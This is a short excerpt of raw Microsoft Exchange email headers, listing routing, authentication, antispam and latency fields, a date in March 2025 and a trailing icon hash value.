X-MS-Exchange-CrossTenant-Network-Message-Id: ffd05e59-a730-4d16-bd90-08dd5dc410e5
X-MS-Exchange-CrossTenant-Id: fd95b4e8-ccc7-4e27-b8dc-ec4c54e4a14d
X-MS-Exchange-CrossTenant-AuthSource: BY1PEPF0001AE18.namprd04.prod.outlook.com
X-MS-Exchange-CrossTenant-AuthAs: Anonymous
X-MS-Exchange-CrossTenant-FromEntityHeader: Internet
X-MS-Exchange-Transport-CrossTenantHeadersStamped: PH7PR11MB5796
X-MS-Exchange-Transport-EndToEndLatency: 00:00:05.1829660
X-MS-Exchange-Processed-By-BccFoldering: 15.20.8511.019
X-Microsoft-Antispam-Mailbox-Delivery: ucf:0;jmr:0;auth:0;dest:I;ENG:(910001)(944506478)(944626604)(4710117)(4712020)(920097)(930097)(140003);
X-Microsoft-Antispam-Message-Info: =?us-ascii?Q?JOogzKhSx5SYzqsIzD+c7fnwPx5SmJzuB/wIohgJgfy10I/Q7bLlO99IyssX?=
date: Fri, 07 Mar 2025 23:04:42 +0100

                                                                                                                            Icon Hash:c4e1928eacb280a2